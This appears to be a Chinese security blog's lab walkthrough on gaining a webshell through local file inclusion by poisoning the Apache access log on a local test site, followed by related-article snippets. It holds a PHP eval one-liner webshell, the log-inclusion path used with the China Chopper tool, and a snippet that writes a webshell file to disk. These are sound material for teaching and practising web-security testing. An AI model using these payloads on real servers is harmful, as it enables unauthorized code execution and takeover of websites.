本地文件包含之包含日志获取webshell

最新推荐文章于 2024-07-10 17:01:06 发布
最新推荐文章于 2024-07-10 17:01:06 发布
阅读量3.3k 收藏 4
点赞数 1
分类专栏: 网络安全

预备知识

程序开发人员通常会把可重复使用的函数写到单个文件中,在使用某些函数时,直接调用此文件,无须再次编写,这种调用文件的过程称为包含。

实验目的

学会包含日志获取webshell

实验工具

浏览器

实验环境

客户机一台

实验步骤

1、访问127.0.0.1/FI/PHP_FI.php?filename=LFI.txt网页显示是文件包含漏洞。

2.浏览器设置代理服务的步骤:点击网页右上角,选择【选项】---【高级】—【网络】—【设置】,选择【手动配置代理】,输入HTTP代理127.0.0.1,端口8080,清空不使用代理下方的文本框,点击确定。

3.刷新浏览器的127.0.0.1/FI/PHP_FI.php?filename=<?php @eval($_POST[1]);?>网页,burpsuite自动抓包,修改为如下。命令是<?php @eval($_POST[1]);?>

修改完毕,点击【Forward】按钮。

4.双击桌面的【实验工具】文件夹,双击打开【中国菜刀】文件夹。找到【中国菜刀.exe】,并双击打开。

空白处右击,选择【添加】。

输入地址http://127.0.0.1/FI/PHP_FI.php?filename=../../../../../phpStudy/Apache/logs/access.log

通天云计算
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 6
    评论
专栏目录
文件包含getshell
qq_32445755的博客
04-11 320
简介 开发人员一般会把重复使用的函数写到单个文件中,需要使用某个函数时直接调用此文件,而无需再次编写,这中文件调用的过程一般被称为文件包含。 allow_url_fopen = On(是否允许打开远程文件) allow_url_include = On(默认关闭,是否允许include/require远程文件)该选项为on便是允许 包含URL 对象文件等。 PHP版本<=5.2 可以使用%00进行截断。(能截断的php版本都小于5.3) PHP共有4个与文件包含相关的函数: inc
文件包含日志中毒(User-Agent)
墨痕诉清风的博客
06-28 1516
目录一、本地文件包含二、日志中毒获取反弹shell获得目标服务器的完全控制权方法一:方法二:/var/log/auth.log  本地文件包含漏洞指的是包含本地的php文件,而通过PHP文件包含漏洞入侵网站,可以浏览同服务器所有文件,并获得webshell。看见?page=标志性注入点,提示我们输入?=page=index.php通过报错,我们可以知道当前文件包含的目录路径是/var/www/dvwa/vulnerabilities/fi/我们可以通过../../../../../etc/passwd 试一
应急响应-Webshell
weixin_45626840的博客
08-15 1582
shell的概念源于操作系统,就是一个解析字符串命令并执行的程序。为了动态执行某些功能,编程语言一般会提供一些函数,将用户输入的字符串解析为语言代码,或解析为操作系统命令。典型的PHP一句话木马php?通过网络IO(socket API),获得cmdeval()将cmd字符串当作操作系统命令执行。Webshell就是指JSP、ASP、PHP等编程语言(网页脚本)的程序,一般带有命令执行、文件操作等功能。通过Web服务器来通信和调用,并具有shell的功能,称为Webshell
【网络安全渗透测试零基础入门必知必会】之什么是文件包含漏洞&分类(非常详细)零基础入门到精通,收藏这一篇就够了
最新发布
HUANGXIN9898的博客
07-10 720
1.文件包含漏洞概述和SQL注入等攻击方式一样,文件包含漏洞也是一种注入型漏洞,其本质就是输入一段用户能够控制的脚本或者代码,并让服务端执行。什么叫包含呢?以PHP为例,我们常常把可重复使用的函数写入到单个文件中,在使用该函数时,直接调用此文件,而无需再次编写函数,这一过程叫做包含。有时候由于网站功能需求,会让前端用户选择要包含的文件,而开发人员又没有对要包含的文件进行安全考虑,就导致攻击者可以通过修改文件的位置来让后台执行任意文件,从而导致文件包含漏洞。
LFI(本地文件包含获取Webshell
weixin_30734435的博客
10-11 450
本地文件包含Web渗透测试中时不时的会遇到。之前遇到本地文件包含的时候,最多就是证明一下:比如包含“/etc/passwd”。有利用本地文件包含来进行Getshell的,之前是略有耳闻的,这两天看相关文章的时候,好奇一下自己搭环境实现了一遍。很老的技术了,看老外在2011年就写了相关文章,不过文章中的Python程序是有问题的。我会在最后把自己修改的代码分享出来。 ...
包含日志文件
arissa666的博客
09-22 260
Apache没有原理:某个PHP文件存在本地包含漏洞,却无法上传正常文件,包含漏洞却不能利用,攻击者就有可能会利用apache日志文件来入侵。Apache服务器运行后会生成两个日志文件,这两个文件是访问日志和error.log(错误日志apache的日志文件记录下我们的操作,并且写到访问日志文件access.log之中。
文件包含日志getshell
qq_42307546的博客
01-15 2078
iis,apache等中间件都会用一个日志文件用来记录一些信息,例如在某个时间段用户访问的url路劲和状态码,如果这个时候将访问的url改为一句话代码就会记录到日志中,在配合文件包含漏洞是可以直接getshell的,当然这个只在windows下有效 在linux日志路劲 /log/apache2/access.log,需要root用户才能读取正常情况不能包含这里为了方便演示直接加权限 创建一个f1.php的文件内容如下 <?php include $GET['filename']; ?> ``
利用 通达OA 文件上传漏洞上传webshell获取主机权限
04-30
帮客户搭建一个演示环境,用于给领导演示,这里我利用了通达OA11.6文件上传漏洞往靶机上上传了一个webshell,然后通过蚁剑去连接webshell从而获取主机权限。 环境要求: 1.靶机环境win10 2.通达OA版本11.6 3.攻击机...
openemrV4.1.0本地靶机获取webshell.docx
06-07
本文总结了从openemrV4.1.0本地靶机获取Webshell的过程,涵盖了Web渗透、SQL注入、Webshell上传和后台管理等多个方面。 Web渗透 在Web渗透中,我们首先需要获取目标IP地址,然后使用Nmap工具扫描开放的端口。Nmap...
WebShell文件上传漏洞分析溯源
02-22
WebShell 文件上传漏洞是指攻击者通过上传恶意文件(如WebShell)来获取服务器的控制权,从而实现对服务器的攻击和控制。这种漏洞通常存在于Web应用程序的上传功能中,攻击者可以通过上传恶意文件来获取服务器的...
web网站文件包含漏洞和攻击-运维安全详细笔记总结
06-30
在实验中,我们使用了 DVWA 安全测试平台,搭建了一个有文件上传漏洞的网站,使用中国菜刀工具获取了网站的 webshell,进而获取了网站和所在服务器的相关数据。 在防御文件包含漏洞时,务必要禁用文件包含功能,...
PHP实现webshell扫描文件木马的方法
10-19
主要介绍了PHP实现webshell扫描文件木马的方法,涉及php针对数值传输的过滤操作与文件识别等相关安全操作技巧,需要的朋友可以参考下
文件包含漏洞-日志注入
superman66697的博客
08-16 1297
文件包含漏洞是 Web 应用程序中的一种常见漏洞。当应用程序允许用户控制包含在页面上的文件时,攻击者就可以利用这一点来包含恶意文件。这种恶意文件可能包含执行恶意代码,导致各种攻击,如代码执行、数据泄露或其他未授权的行为。日志注入是通过插入恶意数据到应用程序的日志文件来实施的攻击。当这些日志被其他系统或应用程序读取和解析时,攻击者的恶意数据可能会被执行。这通常利用了不安全的日志处理机制和文件包含漏洞的组合。
文件包含漏洞包含日志文件获取Shell实战
永远是少年
12-14 981
今天继续给大家介绍渗透测试相关知识,本文主要内容是文件包含漏洞包含日志文件获取Shell实战。 一、文件包含漏洞包含日志文件获取Shell简介 二、文件包含漏洞包含日志文件获取Shell实战
文件包含漏洞拿webshell
weixin_51692662的博客
08-20 847
文件包含漏洞拿webshell
数据库日志WebShell
云舒的博客
05-09 241
日志Shell 主要使用慢日志getshell 进入sql语句执行处、一般都是通过long_query_time选项来设置这个时间值,时间以秒为单位,可以精确到微秒。如果查询时间超过了这个时间值(默认为10秒),这个查询语句将被记录到慢查询日志中。查看服务器默认时间值方式如下: show global variables like '%long_query_time%' 可知延时为10s记录日志。 伪造(修改)slow_query_log_file日志文件的绝对路径以及文件名 show vari
文件包含漏洞】——文件包含漏洞进阶_日志文件包含利用
weixin_45588247的博客
08-05 2845
文章目录一、实验目的:二、工具:三、实验环境:四、原理说明:1. 原理:2. 利用方法:五、日志文件相关:1. 日志文件路径:2. 没有access.log访问日志的原因:3. 开启`access.log`访问日志功能:六、实验过程: 一、实验目的: 1、通过学习日志文件包含漏洞,掌握在目标服务器存在文件包含漏洞的前提下没有上传功能下获取权限的方法。 2、通过搭建漏洞环境,学习绕过技巧。 二、工具: 火狐/谷歌浏览器 burpsuite 三、实验环境: 靶 机: windows10虚拟机:192.
DVWA笔记:利用文件包含漏洞(低级)获取webshell
m0_47470899的博客
01-28 1486
DVWA中文件包含漏洞(远程文件包含) 一、利用kali虚拟机建立服务器,并建立x.txt文件作为远程上传文件: 1、开启kali服务器,输入命令 service apache2 start 2、建立x.txt,在/var/www/html/目录下创建,内容为: <?fputs(fopen("shell60.php","w"),'<?php eval($_POST[moxi]);?>')?> 该代码执行时,将会创建一个名为shell60.php的一句话木马文件。后期通过菜刀软件连
评论 6
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值